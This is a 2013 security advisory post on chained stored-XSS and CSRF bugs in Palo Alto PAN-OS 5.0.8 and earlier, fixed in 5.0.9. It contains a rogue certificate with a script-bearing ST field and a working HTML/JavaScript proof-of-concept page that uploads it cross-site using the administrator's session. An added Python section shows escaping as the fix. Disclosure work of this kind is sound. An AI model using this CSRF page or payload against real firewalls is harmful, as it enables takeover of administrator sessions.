Friday, November 22, 2013

Palo Alto Networks PANOS <= 5.0.8 XSS

Two bugs exist in Palo Alto Networks PANOS <= 5.0.8 which can be chained to conduct a cross-site scripting attack against an administrator of the firewall web interface.
  • Certificate fields (the issuer and subject name attributes) are displayed in the firewall web interface without being HTML-escaped. A certificate whose name attributes contain markup therefore injects that markup into the management UI once it has been imported (a stored XSS).
  • Various file upload forms used by the firewall do not implement proper CSRF protection; import.certificate.php is one example. An attacker who gets a logged-in administrator to visit a page under the attacker's control can therefore upload the rogue certificate on the administrator's behalf, with no further interaction.


Example of a certificate (as printed by openssl x509 -text) whose ST attribute carries HTML that the web interface renders unescaped:

Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number:
            e5:67:53:d1:e4:2a:71:ec
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd
        Validity
            Not Before: Oct  1 16:28:18 2013 GMT
            Not After : Oct  1 16:28:18 2014 GMT
        Subject: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:b1:d1:b4:9a:58:5e:20:99:15:03:f0:38:e5:dd:
                    11:f1:f1:14:26:3b:aa:6e:6b:c1:c1:28:01:be:d3:
                    93:e8:b5:fb:2e:a8:89:b2:87:56:93:54:60:a6:0c:
                    40:85:31:f8:9d:fd:00:0e:2f:f1:58:e6:a5:8a:0a:
                    67:57:70:06:13:02:2e:68:44:8b:a1:23:b1:bd:27:
                    d4:88:9d:f1:44:76:65:bb:e4:70:b5:fe:9c:21:57:
                    6a:11:df:56:b5:5d:c7:18:b9:b1:9a:81:c9:ae:80:
                    16:9d:11:76:e1:6f:a8:94:dd:01:02:c7:87:7e:cc:
                    b0:06:69:d5:84:79:64:45:d3
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha1WithRSAEncryption
        03:12:b6:12:74:67:8f:ac:e0:5f:02:31:b3:63:10:78:33:9d:
        5e:c0:14:d9:d9:f6:ab:17:45:d3:fa:37:b8:c6:15:7c:24:a4:
        83:61:c6:8c:92:1d:2b:2b:0d:f9:84:79:e7:db:26:07:63:e4:
        9b:3a:3c:5f:a4:31:99:4e:79:30:95:a3:ce:86:9c:09:fa:e0:
        3d:7b:c1:c4:ec:7a:79:b3:9c:7f:e2:36:3e:f2:40:cf:c0:57:
        b0:4c:99:18:76:14:23:30:da:b3:90:2d:cd:af:65:80:bc:db:
        db:3f:9e:44:a1:2e:5e:e2:29:83:ff:29:ec:17:df:8f:7b:55:
        5d:ed
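The following is an added example, not code from the original advisory or from PAN-OS. It decodes the rogue certificate above with a minimal DER walker, extracts the subject name attributes, and contrasts a model of the vulnerable rendering described in the first bullet (certificate strings concatenated straight into HTML) with the fix (escaping every certificate-derived string before it reaches the page). The two render_* functions are illustrative models of the UI behaviour, not the firewall's code; the only input is the PEM from this advisory.

```python
import base64
import html

# The rogue certificate from this advisory (the PEM body of the certFile part).
ROGUE_CERT_PEM = """-----BEGIN CERTIFICATE-----
MIICXTCCAcYCCQDlZ1PR5Cpx7DANBgkqhkiG9w0BAQUFADBzMQswCQYDVQQGEwJY
WDEvMC0GA1UECAwmPHN0eWxlIG9ubG9hZD0iamF2YXNjcmlwdDphbGVydCgxKSIg
Lz4xFTATBgNVBAcMDERlZmF1bHQgQ2l0eTEcMBoGA1UECgwTRGVmYXVsdCBDb21w
YW55IEx0ZDAeFw0xMzEwMDExNjI4MThaFw0xNDEwMDExNjI4MThaMHMxCzAJBgNV
BAYTAlhYMS8wLQYDVQQIDCY8c3R5bGUgb25sb2FkPSJqYXZhc2NyaXB0OmFsZXJ0
KDEpIiAvPjEVMBMGA1UEBwwMRGVmYXVsdCBDaXR5MRwwGgYDVQQKDBNEZWZhdWx0
IENvbXBhbnkgTHRkMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCx0bSaWF4g
mRUD8Djl3RHx8RQmO6pua8HBKAG+05PotfsuqImyh1aTVGCmDECFMfid/QAOL/FY
5qWKCmdXcAYTAi5oRIuhI7G9J9SInfFEdmW75HC1/pwhV2oR31a1XccYubGagcmu
gBadEXbhb6iU3QECx4d+zLAGadWEeWRF0wIDAQABMA0GCSqGSIb3DQEBBQUAA4GB
AAMSthJ0Z4+s4F8CMbNjEHgznV7AFNnZ9qsXRdP6N7jGFXwkpINhxoySHSsrDfmE
eefbJgdj5Js6PF+kMZlOeTCVo86GnAn64D17wcTsenmznH/iNj7yQM/AV7BMmRh2
FCMw2rOQLc2vZYC829s/nkShLl7iKYP/KewX3497VV3t
-----END CERTIFICATE-----
"""

# Attribute type OIDs that commonly appear in X.509 names (RFC 5280).
ATTR_NAMES = {
    "2.5.4.3": "CN", "2.5.4.6": "C", "2.5.4.7": "L",
    "2.5.4.8": "ST", "2.5.4.10": "O", "2.5.4.11": "OU",
}

def pem_to_der(pem):
    body = "".join(line.strip() for line in pem.splitlines()
                   if line.strip() and not line.startswith("-----"))
    return base64.b64decode(body)

def read_tlv(buf, pos):
    """Decode one DER tag-length-value at buf[pos]; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def children(value):
    """Split the content of a constructed element (SEQUENCE/SET) into its child TLVs."""
    out, pos = [], 0
    while pos < len(value):
        tag, val, pos = read_tlv(value, pos)
        out.append((tag, val))
    return out

def decode_oid(value):
    arcs = [str(value[0] // 40), str(value[0] % 40)]
    acc = 0
    for b in value[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(str(acc))
            acc = 0
    return ".".join(arcs)

def parse_name(name_value):
    """Name ::= SEQUENCE OF SET OF SEQUENCE { type OBJECT IDENTIFIER, value }"""
    attrs = []
    for _, rdn in children(name_value):
        for _, atv in children(rdn):
            (_, oid), (vtag, vbytes) = children(atv)
            # 0x0C is UTF8String; PrintableString/IA5String are ASCII subsets.
            text = vbytes.decode("utf-8" if vtag == 0x0C else "ascii", "replace")
            dotted = decode_oid(oid)
            attrs.append((ATTR_NAMES.get(dotted, dotted), text))
    return attrs

def subject_attributes(der):
    """Return the subject name of a DER certificate as [(attr, value), ...]."""
    _, cert, _ = read_tlv(der, 0)
    fields = children(children(cert)[0][1])          # tbsCertificate
    if fields[0][0] == 0xA0:                        # optional [0] EXPLICIT version (v2/v3)
        fields = fields[1:]
    # serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo, ...
    return parse_name(fields[4][1])

def render_unsafe(attrs):
    """Model of the pre-5.0.9 behaviour: certificate strings dropped into HTML as-is."""
    return "".join(f"<tr><td>{k}</td><td>{v}</td></tr>" for k, v in attrs)

def render_safe(attrs):
    """Fix: HTML-escape every value that originates from the certificate."""
    return "".join(f"<tr><td>{html.escape(k)}</td><td>{html.escape(v)}</td></tr>"
                   for k, v in attrs)

if __name__ == "__main__":
    attrs = subject_attributes(pem_to_der(ROGUE_CERT_PEM))
    print(", ".join(f"{k}={v}" for k, v in attrs))
    print(render_safe(attrs))
```

Running it prints the same subject that openssl shows above, with the ST attribute intact as `<style onload="javascript:alert(1)" />`; render_safe turns it into `&lt;style onload=&quot;javascript:alert(1)&quot; /&gt;`, which the browser displays as text instead of parsing as an element. The point of the example is that the injected string survives the whole import path (PEM, DER, name parsing) byte for byte, so the only place the bug can be fixed is at the moment the value is written into HTML.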


Example HTML page that POSTs this rogue cert to import.certificate.php cross-site, as the logged-in administrator. The textarea holds the raw multipart/form-data body and is sent verbatim, so the boundary in the Content-Type header must match the delimiter lines, and each part's headers are separated from its value by a blank line as the format requires. The browser sends this without a CORS preflight because multipart/form-data is one of the content types allowed for simple cross-origin requests; the attacker cannot read the response and does not need to, as long as the browser attaches the administrator's session cookie (browsers that default cookies to SameSite=Lax no longer do this for a cross-site POST):

PA: <input type="text" id="url" value="https://10.10.10.22">
<input type=button onclick="upload()" value="Upload Certificate"/>
<hr>
<textarea rows=80 cols=80 id=text>
-----------------------------
Content-Disposition: form-data; name="ext-comp-2304"

on
-----------------------------
Content-Disposition: form-data; name="certFile"; filename="server.crt"
Content-Type: application/octet-stream

-----BEGIN CERTIFICATE-----
MIICXTCCAcYCCQDlZ1PR5Cpx7DANBgkqhkiG9w0BAQUFADBzMQswCQYDVQQGEwJY
WDEvMC0GA1UECAwmPHN0eWxlIG9ubG9hZD0iamF2YXNjcmlwdDphbGVydCgxKSIg
Lz4xFTATBgNVBAcMDERlZmF1bHQgQ2l0eTEcMBoGA1UECgwTRGVmYXVsdCBDb21w
YW55IEx0ZDAeFw0xMzEwMDExNjI4MThaFw0xNDEwMDExNjI4MThaMHMxCzAJBgNV
BAYTAlhYMS8wLQYDVQQIDCY8c3R5bGUgb25sb2FkPSJqYXZhc2NyaXB0OmFsZXJ0
KDEpIiAvPjEVMBMGA1UEBwwMRGVmYXVsdCBDaXR5MRwwGgYDVQQKDBNEZWZhdWx0
IENvbXBhbnkgTHRkMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCx0bSaWF4g
mRUD8Djl3RHx8RQmO6pua8HBKAG+05PotfsuqImyh1aTVGCmDECFMfid/QAOL/FY
5qWKCmdXcAYTAi5oRIuhI7G9J9SInfFEdmW75HC1/pwhV2oR31a1XccYubGagcmu
gBadEXbhb6iU3QECx4d+zLAGadWEeWRF0wIDAQABMA0GCSqGSIb3DQEBBQUAA4GB
AAMSthJ0Z4+s4F8CMbNjEHgznV7AFNnZ9qsXRdP6N7jGFXwkpINhxoySHSsrDfmE
eefbJgdj5Js6PF+kMZlOeTCVo86GnAn64D17wcTsenmznH/iNj7yQM/AV7BMmRh2
FCMw2rOQLc2vZYC829s/nkShLl7iKYP/KewX3497VV3t
-----END CERTIFICATE-----
-----------------------------
Content-Disposition: form-data; name="ext-comp-2306"

Base64 Encoded Certificate (PEM)
-----------------------------
Content-Disposition: form-data; name="keyFile"; filename=""
Content-Type: application/octet-stream


-----------------------------
Content-Disposition: form-data; name="bImportCertificateSubmit"

OK
-----------------------------
Content-Disposition: form-data; name="certFileC"

server.crt
-----------------------------
Content-Disposition: form-data; name="vsysC"

shared
-----------------------------
Content-Disposition: form-data; name="passPhrase"


-----------------------------
Content-Disposition: form-data; name="keyFileC"


-----------------------------
Content-Disposition: form-data; name="certName"

TPOLLET
-----------------------------
Content-Disposition: form-data; name="format"

pem
-----------------------------
Content-Disposition: form-data; name="includekey"


-----------------------------
Content-Disposition: form-data; name="certType"

device
-----------------------------
Content-Disposition: form-data; name="template"


-------------------------------
</textarea>
<script>
function upload() {
  // Raw multipart body from the textarea; the delimiter lines are "--" + boundary.
  var text = document.getElementById('text').value;
  var host = document.getElementById('url').value;
  var url  = host + "/php/device/import.certificate.php";
  var xhr  = new XMLHttpRequest();
  // Send the victim's session cookie along with the cross-site request.
  xhr.withCredentials = true;
  xhr.open("POST", url, true);
  // Boundary must equal the delimiter lines above without their leading "--".
  xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------");
  xhr.send(text);
  alert('check ' + host + '/#device::vsys1::device/certificate-management/certificates' );
}
</script>

These issues have been fixed in PANOS 5.0.9. The release notes only call out the certificate rendering bug, like this:

57343—Fixed an issue that caused improper handling of imported certificates that contained HTML.